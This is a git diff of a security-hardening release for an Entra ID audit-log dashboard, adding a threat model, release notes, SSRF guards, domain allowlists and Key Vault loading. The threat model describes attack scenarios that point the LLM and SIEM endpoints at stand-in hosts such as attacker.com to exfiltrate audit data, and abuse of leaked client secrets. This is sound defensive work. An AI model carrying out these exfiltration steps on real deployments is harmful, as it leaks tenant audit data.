diff --git a/.env.example b/.env.example index f4a0ee6..1e9f1e1 100644 --- a/.env.example +++ b/.env.example @@ -30,6 +30,15 @@ CORS_ORIGINS=* # OpenAPI docs exposure (set true only for dev) DOCS_ENABLED=false +# LLM endpoint domain restriction (comma-separated, supports wildcards like *.openai.azure.com) +# LLM_ALLOWED_DOMAINS=api.openai.com,*.openai.azure.com + +# SIEM webhook domain restriction (comma-separated) +# SIEM_ALLOWED_DOMAINS=your-siem.com + +# Optional Azure Key Vault for secrets storage +# AZURE_KEY_VAULT_NAME=your-keyvault-name + # Optional: SIEM export webhook (e.g., Splunk HEC, Sentinel, or generic syslog webhook) SIEM_ENABLED=false SIEM_WEBHOOK_URL= diff --git a/RELEASE_NOTES_v1.7.14.md b/RELEASE_NOTES_v1.7.14.md new file mode 100644 index 0000000..53c6bb0 --- /dev/null +++ b/RELEASE_NOTES_v1.7.14.md @@ -0,0 +1,64 @@ +# AOC v1.7.14 Release Notes + +**Release Date:** 2026-04-27 + +## Security Hardening: Threat Model Remediation + +This release addresses the high-severity findings from the v1.7.13 threat model review. 
+ +### LLM Endpoint Domain Allowlist + +- **New config:** `LLM_ALLOWED_DOMAINS` (comma-separated, supports wildcards like `*.openai.azure.com`) +- **Behavior:** When configured, the `/api/ask` endpoint rejects `LLM_BASE_URL` domains not in the allowlist +- **Impact:** Prevents audit data exfiltration via a compromised or attacker-controlled LLM endpoint + +### SIEM Webhook SSRF Guard + +- **New config:** `SIEM_ALLOWED_DOMAINS` (comma-separated) +- **Behavior:** The SIEM forwarder now validates `SIEM_WEBHOOK_URL` with the same SSRF checks as the LLM endpoint (HTTPS-only, blocks private IPs, enforces domain allowlist) +- **Impact:** Prevents real-time audit data exfiltration via a malicious SIEM webhook URL + +### CDN Subresource Integrity (SRI) + +- Added `integrity` hashes to both CDN scripts in the frontend: + - Alpine.js 3.15.11: `sha384-WPtu0YHhJ3arcykfnv1JgUffWDSKRnqnDeTpJUbOc2os2moEmLkIdaeR0trPN4be` + - MSAL.js 2.37.0: `sha384-DUSOaqAzlZRiZxkDi8hL7hXJDZ+X39ZOAYV9ZDx44gUv9pozmcunJH02tjSFLPnW` +- **Impact:** Browser refuses to execute CDN scripts if the content doesn't match the hash, preventing supply chain compromise + +### Auth Misconfiguration Warning + +- At startup, AOC now logs a `WARNING` if `AUTH_ENABLED=true` but neither `AUTH_ALLOWED_ROLES` nor `AUTH_ALLOWED_GROUPS` is configured +- **Impact:** Operators are alerted when the app is accidentally left open to all Entra users + +### Azure Key Vault Integration (Optional) + +- **New module:** `backend/secrets_manager.py` +- **New config:** `AZURE_KEY_VAULT_NAME` +- **Behavior:** If `AZURE_KEY_VAULT_NAME` is set, AOC fetches these secrets from Key Vault at startup: + - `aoc-client-secret` → `CLIENT_SECRET` + - `aoc-llm-api-key` → `LLM_API_KEY` + - `aoc-mongo-uri` → `MONGO_URI` + - `aoc-webhook-client-secret` → `WEBHOOK_CLIENT_SECRET` +- Falls back silently to `.env` / environment variables when Key Vault is not configured +- **Dependencies:** `azure-identity` and `azure-keyvault-secrets` (commented out in 
`requirements.txt` — uncomment when using Key Vault) +- **Impact:** Eliminates long-lived secrets from `.env` files and Docker images + +## Files Changed + +| File | Change | +|------|--------| +| `backend/config.py` | Added `LLM_ALLOWED_DOMAINS`, `SIEM_ALLOWED_DOMAINS`, `AZURE_KEY_VAULT_NAME` | +| `backend/routes/ask.py` | Domain allowlist enforcement for LLM URL | +| `backend/siem.py` | SSRF guard + domain allowlist for SIEM webhook | +| `backend/frontend/index.html` | SRI hashes for Alpine.js and MSAL.js | +| `backend/main.py` | Startup warning for auth misconfiguration | +| `backend/secrets_manager.py` | New — Azure Key Vault integration | +| `backend/requirements.txt` | Added optional Azure Key Vault packages | +| `.env.example` | Documented new settings | +| `VERSION` | Bumped to 1.7.14 | +| `THREAT_MODEL_v1.7.13.md` | Threat model documentation | + +## Test Results + +- **80/80 pytest tests passing** +- Ruff lint/format clean diff --git a/THREAT_MODEL_v1.7.13.md b/THREAT_MODEL_v1.7.13.md new file mode 100644 index 0000000..2e08e32 --- /dev/null +++ b/THREAT_MODEL_v1.7.13.md @@ -0,0 +1,321 @@ +# AOC Threat Model — v1.7.13 + +**Date:** 2026-04-27 +**Scope:** Entra ID / Microsoft Graph integration, token handling, data flows, external dependencies +**Assumptions:** Deployment is Docker Compose behind nginx reverse proxy; `AUTH_ENABLED=true`; `AI_FEATURES_ENABLED` may be true or false. 
+ +--- + +## Attack Surface Map + +``` +┌─────────────────────────────────────────────────────────────────────────────┐ +│ ATTACKER │ +│ │ │ │ │ +│ ▼ ▼ ▼ │ +│ ┌─────────────┐ ┌──────────────┐ ┌─────────────────┐ │ +│ │ Frontend │ │ API │ │ Webhook │ │ +│ │ (CDN JS) │ │ (/api/*) │ │ (/api/webhooks)│ │ +│ └──────┬──────┘ └──────┬───────┘ └────────┬────────┘ │ +│ │ │ │ │ +│ ▼ ▼ ▼ │ +│ ┌─────────────────────────────────────────────────────────────┐ │ +│ │ AOC BACKEND │ │ +│ │ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ │ │ +│ │ │ Auth │ │ Events │ │ Fetch │ │ Ask/LLM │ │ │ +│ │ │ (JWT) │ │ (Mongo) │ │ (Graph) │ │ (HTTP) │ │ │ +│ │ └────┬─────┘ └────┬─────┘ └────┬─────┘ └────┬─────┘ │ │ +│ │ │ │ │ │ │ │ +│ │ ▼ ▼ ▼ ▼ │ │ +│ │ ┌─────────────────────────────────────────────────────┐ │ │ +│ │ │ SECRETS / CREDENTIALS │ │ │ +│ │ │ CLIENT_SECRET │ LLM_API_KEY │ MONGO_PASSWORD │ │ │ +│ │ └─────────────────────────────────────────────────────┘ │ │ +│ └─────────────────────────────────────────────────────────────┘ │ +│ │ │ │ │ +│ ▼ ▼ ▼ │ +│ ┌─────────────┐ ┌──────────────┐ ┌─────────────────┐ │ +│ │ Microsoft │ │ LLM API │ │ SIEM Webhook │ │ +│ │ Graph API │ │ (OpenAI/ │ │ (optional) │ │ +│ │ │ │ Azure) │ │ │ │ +│ └─────────────┘ └──────────────┘ └─────────────────┘ │ +└─────────────────────────────────────────────────────────────────────────────┘ +``` + +--- + +## 1. 
Entra App Registration Abuse — HIGH + +### 1.1 Client Credentials Leak = Full Tenant Read + +**How it works:** +- AOC uses `client_credentials` flow (`graph/auth.py`) +- `CLIENT_ID` + `CLIENT_SECRET` are exchanged for an access token at `login.microsoftonline.com` +- The token has `https://graph.microsoft.com/.default` scope +- This grants **all application permissions** configured in the Entra app registration + +**Typical permissions:** +- `Directory.Read.All` — read all users, groups, devices, roles +- `AuditLog.Read.All` — read all audit logs +- `DeviceManagementManagedDevices.Read.All` — read all Intune devices + +**Attack scenario:** +1. Attacker gains read access to `.env` or the Docker container filesystem +2. Attacker calls the token endpoint directly with the leaked `CLIENT_ID`/`CLIENT_SECRET` +3. Attacker receives a Graph API access token valid for ~1 hour +4. Attacker can query ALL tenant data independently of AOC + +**Impact:** Complete tenant data exfiltration — users, groups, devices, audit logs, mailboxes (if `Exchange.Read` granted). + +**Mitigation in place:** None. The backend needs these permissions to function. + +**Recommendation:** +- Store `CLIENT_SECRET` in a secret manager (Azure Key Vault, HashiCorp Vault) rather than `.env` +- Use short-lived certificates instead of long-lived secrets for app authentication +- Monitor Entra sign-in logs for anomalous `client_credentials` token requests +- Restrict app registration permissions to the absolute minimum (e.g., `AuditLog.Read.All` + `Directory.Read.All` only) + +--- + +### 1.2 No Scope Restriction on Graph Token + +**Finding:** `get_access_token()` always requests `https://graph.microsoft.com/.default` — the full permission set. There's no mechanism to request narrower scopes for specific operations. + +**Impact:** If the app registration has 10 permissions, every token has all 10. A bug in one code path could expose data from all 10 permission areas. 
+ +**Recommendation:** Not easily fixable without splitting into multiple app registrations. Document as accepted risk. + +--- + +## 2. Authentication & Token Validation — MEDIUM + +### 2.1 JWKS Fetch Without TLS Certificate Validation Hardening + +**Finding:** `_get_jwks()` fetches OIDC configuration and JWKS from `login.microsoftonline.com` using standard `requests` TLS validation. No certificate pinning or CA bundle restriction. + +**Attack scenario (advanced):** +1. Attacker compromises DNS or a network hop between AOC and Microsoft +2. Attacker serves a fake JWKS endpoint with their own public key +3. Attacker issues a forged JWT signed with their private key +4. AOC validates the forged JWT against the attacker's public key +5. Attacker gains authenticated access + +**Likelihood:** Very low (requires DNS compromise or nation-state-level interception). + +**Mitigation:** Standard TLS validation is in place. For high-security environments, consider pinning the `login.microsoftonline.com` certificate thumbprint. + +--- + +### 2.2 Missing `nbf` / `iat` Claim Verification + +**Finding:** `_decode_token()` verifies `exp`, `tid`, `iss`, and `aud` but does not check `nbf` (not before) or `iat` (issued at) claims. + +**Impact:** A token used before its validity period (`nbf`) or with a suspicious future `iat` would be accepted. Minor issue — MSAL tokens are well-formed in practice. + +--- + +### 2.3 Role/Group Gating Defaults to "Allow All" + +**Finding:** In `auth.py`: +```python +def _allowed(claims, allowed_roles, allowed_groups): + if not allowed_roles and not allowed_groups: + return True +``` + +**Impact:** If `AUTH_ENABLED=true` but `AUTH_ALLOWED_ROLES` and `AUTH_ALLOWED_GROUPS` are left empty (the default), **every Entra user in the tenant** can authenticate and use AOC. This is a common misconfiguration. + +**Recommendation:** Add a startup warning when auth is enabled but no roles/groups are configured. Consider changing the default to deny-all. 
+ +--- + +### 2.4 Privacy Service Role Gating Also Defaults to "Allow All" + +**Finding:** `user_can_access_privacy_services()` returns `True` if `PRIVACY_SERVICE_ROLES` is empty. If an admin configures `PRIVACY_SERVICES` (e.g., `Exchange`) but forgets to set `PRIVACY_SERVICE_ROLES`, all users see all privacy data. + +--- + +## 3. Data Exfiltration Paths — HIGH + +### 3.1 LLM Endpoint as Data Exfiltration Channel + +**Finding:** When `AI_FEATURES_ENABLED=true` and `LLM_API_KEY` is set: +- The `/api/ask` endpoint sends audit event data (actors, targets, operations, summaries) to the configured LLM API +- `_validate_llm_url()` blocks private IPs but does NOT restrict the domain to an allowlist +- Any HTTPS URL is accepted + +**Attack scenario:** +1. Attacker gains `.env` write access (or container filesystem access) +2. Attacker changes `LLM_BASE_URL` to `https://attacker.com/fake-llm` +3. Attacker sends an `/api/ask` request like "show me all events" +4. AOC queries MongoDB and sends up to `LLM_MAX_EVENTS` (default 200) events to the attacker's URL +5. Attacker receives structured audit data including actor names, UPNs, device names, operation details + +**Impact:** Up to 200 audit events exfiltrated per API call. With pagination, an attacker could exfiltrate the entire database. + +**Mitigation in place:** SSRF guard blocks private IPs and localhost. + +**Gap:** No domain allowlist. An attacker-controlled public HTTPS endpoint is accepted. 
+ +**Recommendation:** +- Add `LLM_ALLOWED_DOMAINS` config (e.g., `api.openai.com,*.openai.azure.com`) +- Validate `LLM_BASE_URL` against this allowlist at startup and on every request +- Log all LLM requests with event counts sent + +--- + +### 3.2 SIEM Webhook as Real-Time Exfiltration Channel + +**Finding:** `siem.py` forwards every normalized event to `SIEM_WEBHOOK_URL` during ingestion: +```python +def forward_event(event): + if not SIEM_ENABLED or not SIEM_WEBHOOK_URL: + return + requests.post(SIEM_WEBHOOK_URL, json=event, timeout=10) +``` + +**Gap:** No URL validation at all. Unlike the LLM endpoint, the SIEM webhook has NO SSRF guard. + +**Attack scenario:** +1. Attacker sets `SIEM_ENABLED=true` and `SIEM_WEBHOOK_URL=https://attacker.com/collect` +2. Every new audit event fetched from Graph is immediately POSTed to the attacker's URL +3. Attacker receives real-time stream of all tenant audit events + +**Impact:** Real-time, continuous data exfiltration of all audit events. + +**Recommendation:** +- Add the same SSRF validation to `SIEM_WEBHOOK_URL` that exists for `LLM_BASE_URL` +- Add `SIEM_ALLOWED_DOMAINS` config +- Log SIEM forwarding failures prominently + +--- + +### 3.3 Export Features (JSON/CSV) + +**Finding:** The frontend has `exportJSON()` and `exportCSV()` functions that download all currently filtered events. These are authenticated but not rate-limited separately from `/api/events`. + +**Impact:** A compromised account can export large batches of events. However, this requires authentication and is bounded by the 500-event page size limit. + +**Risk level:** LOW — requires valid auth and is noisy. + +--- + +## 4. 
Webhook Abuse — MEDIUM + +### 4.1 Graph Change Notification Webhook + +**Finding:** `/api/webhooks/graph` receives Microsoft Graph change notifications: +- Echoes `validationToken` for subscription handshake +- Accepts notifications with optional `clientState` validation +- `WEBHOOK_CLIENT_SECRET` is empty by default + +**Attack scenario 1 — Subscription hijacking:** +1. Attacker discovers the webhook URL (via API enumeration or guess) +2. Attacker creates a Graph subscription pointing to the AOC webhook URL +3. AOC's webhook then receives change notifications for a resource the attacker chose, i.e. notifications AOC never subscribed to + +**Mitigation:** Notifications without matching `clientState` are rejected when `WEBHOOK_CLIENT_SECRET` is configured. But it's empty by default. + +**Attack scenario 2 — Validation token abuse:** +1. Attacker sends a POST to `/api/webhooks/graph?validationToken=<attacker-chosen value>` +2. AOC echoes the token back as `text/plain` +3. Could be used for cache poisoning or response splitting + +**Mitigation:** Length and ASCII validation added in v1.7.12. + +**Recommendation:** +- Require `WEBHOOK_CLIENT_SECRET` to be set in production +- Document that the webhook endpoint should NOT be exposed to the public internet + +--- + +## 5. Supply Chain — MEDIUM + +### 5.1 CDN Scripts Without Subresource Integrity (SRI) + +**Finding:** The frontend loads two external scripts without SRI hashes: +```html +<script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.15.11/dist/cdn.min.js"></script> +<script src="https://alcdn.msauth.net/browser/2.37.0/js/msal-browser.min.js"></script> +``` + +**Attack scenario:** +1. `cdn.jsdelivr.net` or `alcdn.msauth.net` is compromised (supply chain attack) +2. Malicious JavaScript is served instead of the legitimate library +3. Malicious script can steal MSAL tokens, modify API requests, or exfiltrate data + +**Impact:** Complete frontend compromise — token theft, data exfiltration, UI spoofing. + +**Recommendation:** +- Add SRI hashes to both script tags: + ```html + <script src="https://cdn.jsdelivr.net/npm/alpinejs@3.15.11/dist/cdn.min.js" integrity="sha384-..." crossorigin="anonymous"></script> + ``` +- Or vendor the JS files and serve them from the same origin + +--- + +## 6. 
Privilege Escalation — MEDIUM + +### 6.1 Application Permissions Bypass User Boundaries + +**Finding:** Because AOC uses application permissions (not delegated permissions), the backend can read audit logs for ALL users, not just the authenticated user. The privacy service filtering (`PRIVACY_SERVICES`) is the only boundary — and it's opt-in. + +**Impact:** A user with minimal Entra permissions (e.g., a regular user who can authenticate) can view audit logs for the entire tenant if: +- `PRIVACY_SERVICES` is not configured, OR +- `PRIVACY_SERVICE_ROLES` is not configured + +**Recommendation:** +- Document that AOC should be restricted to admin/security roles via `AUTH_ALLOWED_ROLES` +- Consider adding per-user event filtering (only show events where the authenticated user is the actor or target) + +--- + +## 7. Miscellaneous Vectors — LOW + +### 7.1 Token Cache in Memory + +**Finding:** `_TOKEN_CACHE` in `graph/auth.py` is an in-memory dictionary. If an attacker gains code execution in the Python process, they can read the cache or call `get_access_token()` directly. + +**Impact:** Attacker with code execution can get Graph API tokens. But if they have code execution, they already have `CLIENT_SECRET` from memory or `.env`. + +### 7.2 MongoDB Connection String + +**Finding:** `MONGO_URI` contains credentials. If an attacker gains filesystem access, they can connect directly to MongoDB and bypass all AOC auth/privacy controls. + +**Mitigation:** MongoDB is internal to Docker network (not exposed to host in production compose file). + +### 7.3 Audit Trail Log Injection + +**Finding:** `audit_trail.log_action()` stores actions in MongoDB. The `details` dict could contain user-controlled data (e.g., filter values). If the audit log is ever rendered without escaping, this could lead to XSS. + +**Risk level:** LOW — audit logs are not currently rendered in the UI. 
+ +--- + +## Risk Summary + +| Vector | Severity | Likelihood | Requires | +|--------|----------|------------|----------| +| Client secret leak → full tenant read | **HIGH** | Medium | `.env` or container access | +| LLM endpoint hijacking → data exfil | **HIGH** | Low | `.env` write access | +| SIEM webhook hijacking → real-time exfil | **HIGH** | Low | `.env` write access | +| CDN compromise → frontend token theft | **MEDIUM** | Low | Supply chain attack | +| Role gating misconfig → all users access | **MEDIUM** | High | Misconfiguration | +| Webhook subscription hijacking | **MEDIUM** | Low | URL discovery | +| DNS compromise → fake JWKS | **MEDIUM** | Very low | Network compromise | +| Application permissions bypass boundaries | **MEDIUM** | High | Default config | +| Token replay | LOW | Low | Token theft | +| Audit log injection | LOW | Low | Filter manipulation | + +--- + +## Immediate Recommendations + +1. **Add LLM domain allowlist** (`LLM_ALLOWED_DOMAINS`) and validate at startup +2. **Add SIEM SSRF guard** — reuse `_validate_llm_url()` for `SIEM_WEBHOOK_URL` +3. **Add SRI hashes** to CDN script tags, or vendor the libraries +4. **Add startup warning** when auth is enabled but no `AUTH_ALLOWED_ROLES`/`AUTH_ALLOWED_GROUPS` configured +5. **Document webhook security** — require `WEBHOOK_CLIENT_SECRET` in production +6. **Consider Key Vault integration** for `CLIENT_SECRET` and `LLM_API_KEY` +7. **Add per-user filtering option** — restrict events to those involving the authenticated user diff --git a/VERSION b/VERSION index 36c5cb9..68ced4b 100644 --- a/VERSION +++ b/VERSION @@ -1 +1 @@ -1.7.13 +1.7.14 diff --git a/backend/config.py b/backend/config.py index bc8333c..30d42c3 100644 --- a/backend/config.py +++ b/backend/config.py @@ -1,4 +1,10 @@ -from pydantic_settings import BaseSettings, SettingsConfigDict +from secrets_manager import load_key_vault_secrets + +# Pre-load Azure Key Vault secrets into os.environ before pydantic-settings reads them. 
+# This is a no-op if AZURE_KEY_VAULT_NAME is not set. +load_key_vault_secrets() + +from pydantic_settings import BaseSettings, SettingsConfigDict # noqa: E402 class Settings(BaseSettings): @@ -80,6 +86,15 @@ class Settings(BaseSettings): DOCS_ENABLED: bool = False METRICS_ALLOWED_IPS: str = "127.0.0.1,::1,10.0.0.0/8,172.16.0.0/12,192.168.0.0/16" + # LLM endpoint restriction (comma-separated domains, e.g. "api.openai.com,*.openai.azure.com") + LLM_ALLOWED_DOMAINS: str = "" + + # SIEM webhook restriction (comma-separated domains) + SIEM_ALLOWED_DOMAINS: str = "" + + # Optional Azure Key Vault integration for secrets + AZURE_KEY_VAULT_NAME: str = "" + _settings = Settings() @@ -134,3 +149,8 @@ RATE_LIMIT_WINDOW_SECONDS = _settings.RATE_LIMIT_WINDOW_SECONDS DOCS_ENABLED = _settings.DOCS_ENABLED METRICS_ALLOWED_IPS = _settings.METRICS_ALLOWED_IPS + +LLM_ALLOWED_DOMAINS = [d.strip().lower() for d in _settings.LLM_ALLOWED_DOMAINS.split(",") if d.strip()] +SIEM_ALLOWED_DOMAINS = [d.strip().lower() for d in _settings.SIEM_ALLOWED_DOMAINS.split(",") if d.strip()] + +AZURE_KEY_VAULT_NAME = _settings.AZURE_KEY_VAULT_NAME diff --git a/backend/frontend/index.html b/backend/frontend/index.html index 05c131f..8b95074 100644 --- a/backend/frontend/index.html +++ b/backend/frontend/index.html @@ -5,8 +5,8 @@ Admin Operations Center - - + +
diff --git a/backend/main.py b/backend/main.py index 36a1b53..a980cae 100644 --- a/backend/main.py +++ b/backend/main.py @@ -10,6 +10,8 @@ import structlog from audit_trail import log_action from config import ( AI_FEATURES_ENABLED, + AUTH_ALLOWED_GROUPS, + AUTH_ALLOWED_ROLES, AUTH_ENABLED, CORS_ORIGINS, DOCS_ENABLED, @@ -275,6 +277,13 @@ async def start_periodic_fetch(): auth_enabled=AUTH_ENABLED, ai_enabled=AI_FEATURES_ENABLED, ) + # Warn when auth is enabled but no role/group restrictions are configured + if AUTH_ENABLED and not AUTH_ALLOWED_ROLES and not AUTH_ALLOWED_GROUPS: + logger.warning( + "AUTH_ENABLED is true but no AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS are configured. " + "Any Entra user in the tenant can authenticate and access AOC. " + "Set AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS to restrict access." + ) if ENABLE_PERIODIC_FETCH: app.state.fetch_task = asyncio.create_task(_periodic_fetch()) diff --git a/backend/requirements.txt b/backend/requirements.txt index 0adcdf5..f3e1add 100644 --- a/backend/requirements.txt +++ b/backend/requirements.txt @@ -16,3 +16,8 @@ gunicorn mcp redis arq + +# Optional: Azure Key Vault integration for secrets storage +# Uncomment if using AZURE_KEY_VAULT_NAME +# azure-identity +# azure-keyvault-secrets diff --git a/backend/routes/ask.py b/backend/routes/ask.py index e48117e..f009d8b 100644 --- a/backend/routes/ask.py +++ b/backend/routes/ask.py @@ -7,6 +7,7 @@ import httpx import structlog from auth import require_auth, user_can_access_privacy_services from config import ( + LLM_ALLOWED_DOMAINS, LLM_API_KEY, LLM_API_VERSION, LLM_BASE_URL, @@ -398,7 +399,7 @@ def _format_events_for_llm( def _validate_llm_url(url: str): - """Prevent SSRF by rejecting internal/reserved addresses.""" + """Prevent SSRF by rejecting internal/reserved addresses and enforcing domain allowlist.""" from urllib.parse import urlparse parsed = urlparse(url) @@ -420,6 +421,12 @@ def _validate_llm_url(url: str): except ValueError: pass # hostname 
is not an IP, which is fine
 
+    # Enforce domain allowlist if configured
+    if LLM_ALLOWED_DOMAINS:
+        allowed = any(hostname == d or (d.startswith("*.") and hostname.endswith(d[1:])) for d in LLM_ALLOWED_DOMAINS)
+        if not allowed:
+            raise RuntimeError(f"LLM_BASE_URL domain '{hostname}' is not in LLM_ALLOWED_DOMAINS")
+
 
 def _build_chat_url(base_url: str, api_version: str) -> str:
     base = base_url.rstrip("/")
diff --git a/backend/secrets_manager.py b/backend/secrets_manager.py
new file mode 100644
index 0000000..6a7488c
--- /dev/null
+++ b/backend/secrets_manager.py
@@ -0,0 +1,92 @@
+"""Optional Azure Key Vault integration for secrets storage.
+
+If AZURE_KEY_VAULT_NAME is configured, sensitive secrets are fetched from
+Azure Key Vault at startup and injected into the environment so that
+pydantic-settings can read them. Falls back to .env / environment variables
+when Key Vault is not configured.
+
+Secret naming convention in Key Vault:
+    aoc-client-secret → CLIENT_SECRET
+    aoc-llm-api-key → LLM_API_KEY
+    aoc-mongo-uri → MONGO_URI
+    aoc-webhook-client-secret → WEBHOOK_CLIENT_SECRET
+"""
+
+import os
+
+import structlog
+
+logger = structlog.get_logger("aoc.secrets")
+
+# Key Vault secret name -> environment variable that receives its value.
+_KEY_VAULT_SECRET_MAP = {
+    "aoc-client-secret": "CLIENT_SECRET",
+    "aoc-llm-api-key": "LLM_API_KEY",
+    "aoc-mongo-uri": "MONGO_URI",
+    "aoc-webhook-client-secret": "WEBHOOK_CLIENT_SECRET",
+}
+
+
+def _load_from_key_vault(vault_name: str) -> dict[str, str]:
+    """Fetch the mapped secrets from Azure Key Vault as {env_name: value}.
+
+    A secret whose lookup raises is logged as a warning and skipped, and a
+    secret with an empty value is skipped, so one bad entry does not block
+    the others.
+
+    Raises:
+        RuntimeError: if the Azure SDK packages cannot be imported.
+    """
+    try:
+        from azure.identity import DefaultAzureCredential
+        from azure.keyvault.secrets import SecretClient
+    except ImportError as exc:
+        raise RuntimeError(
+            "Azure Key Vault libraries are not installed. Run: pip install azure-identity azure-keyvault-secrets"
+        ) from exc
+
+    vault_url = f"https://{vault_name}.vault.azure.net/"
+    credential = DefaultAzureCredential()
+    client = SecretClient(vault_url=vault_url, credential=credential)
+
+    loaded = {}
+    for kv_name, env_name in _KEY_VAULT_SECRET_MAP.items():
+        try:
+            secret = client.get_secret(kv_name)
+            if secret.value:
+                loaded[env_name] = secret.value
+                logger.info("Loaded secret from Key Vault", secret_name=kv_name)
+        except Exception as exc:
+            # Best-effort: keep loading the remaining secrets.
+            logger.warning(
+                "Failed to load secret from Key Vault",
+                secret_name=kv_name,
+                error=str(exc),
+            )
+    return loaded
+
+
+def load_key_vault_secrets(vault_name: str | None = None) -> None:
+    """Load secrets from Azure Key Vault into os.environ if configured.
+
+    This should be called BEFORE pydantic-settings parses configuration.
+
+    The vault name comes from the argument or, failing that, from the
+    AZURE_KEY_VAULT_NAME process environment variable; nothing else is
+    consulted here, and the call is a no-op when neither is set. Values
+    fetched from Key Vault overwrite same-named environment variables.
+    """
+    vault = vault_name or os.environ.get("AZURE_KEY_VAULT_NAME", "")
+    if not vault:
+        return
+
+    logger.info("Loading secrets from Azure Key Vault", vault_name=vault)
+    secrets = _load_from_key_vault(vault)
+    for env_name, value in secrets.items():
+        os.environ[env_name] = value
+    # Only the variable names are logged, never the secret values.
+    logger.info(
+        "Key Vault secrets loaded",
+        count=len(secrets),
+        keys=list(secrets.keys()),
+    )
diff --git a/backend/siem.py b/backend/siem.py
index 2e41d27..36734d1 100644
--- a/backend/siem.py
+++ b/backend/siem.py
@@ -1,15 +1,54 @@
+import ipaddress
+
 import requests
 import structlog
-from config import SIEM_ENABLED, SIEM_WEBHOOK_URL
+from config import SIEM_ALLOWED_DOMAINS, SIEM_ENABLED, SIEM_WEBHOOK_URL
 
 logger = structlog.get_logger("aoc.siem")
 
 
+def _validate_siem_url(url: str):
+    """Reject SIEM webhook URLs that could enable SSRF or data exfiltration.
+
+    Requires HTTPS and a hostname, refuses well-known loopback/metadata hosts
+    and private, loopback, link-local or reserved IP literals, and, when
+    SIEM_ALLOWED_DOMAINS is non-empty, requires an exact or "*.suffix" match.
+    Only the URL text is inspected; no DNS resolution is performed here.
+
+    Raises:
+        RuntimeError: if any check fails.
+    """
+    from urllib.parse import urlparse
+
+    parsed = urlparse(url)
+    if parsed.scheme != "https":
+        raise RuntimeError("SIEM_WEBHOOK_URL must use HTTPS")
+    # Strip the trailing root dot of a fully qualified name so "localhost." or
+    # "127.0.0.1." cannot slip past the checks below.
+    hostname = (parsed.hostname or "").lower().rstrip(".")
+    if not hostname:
+        raise RuntimeError("SIEM_WEBHOOK_URL must have a valid hostname")
+    blocked = {"localhost", "127.0.0.1", "0.0.0.0", "::1", "169.254.169.254"}
+    if hostname in blocked:
+        raise RuntimeError(f"SIEM_WEBHOOK_URL hostname '{hostname}' is not allowed")
+    try:
+        ip = ipaddress.ip_address(hostname)
+        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
+            raise RuntimeError(f"SIEM_WEBHOOK_URL IP '{hostname}' is not allowed")
+    except ValueError:
+        pass  # hostname is not an IP literal, which is fine
+    if SIEM_ALLOWED_DOMAINS:
+        allowed = any(hostname == d or (d.startswith("*.") and hostname.endswith(d[1:])) for d in SIEM_ALLOWED_DOMAINS)
+        if not allowed:
+            raise RuntimeError(f"SIEM_WEBHOOK_URL domain '{hostname}' is not in SIEM_ALLOWED_DOMAINS")
+
+
 def forward_event(event: dict):
     """Forward a normalized event to the configured SIEM webhook."""
     if not SIEM_ENABLED or not SIEM_WEBHOOK_URL:
         return
     try:
+        _validate_siem_url(SIEM_WEBHOOK_URL)
         res = requests.post(SIEM_WEBHOOK_URL, json=event, timeout=10)
         res.raise_for_status()
         logger.debug("Event forwarded to SIEM", event_id=event.get("id"))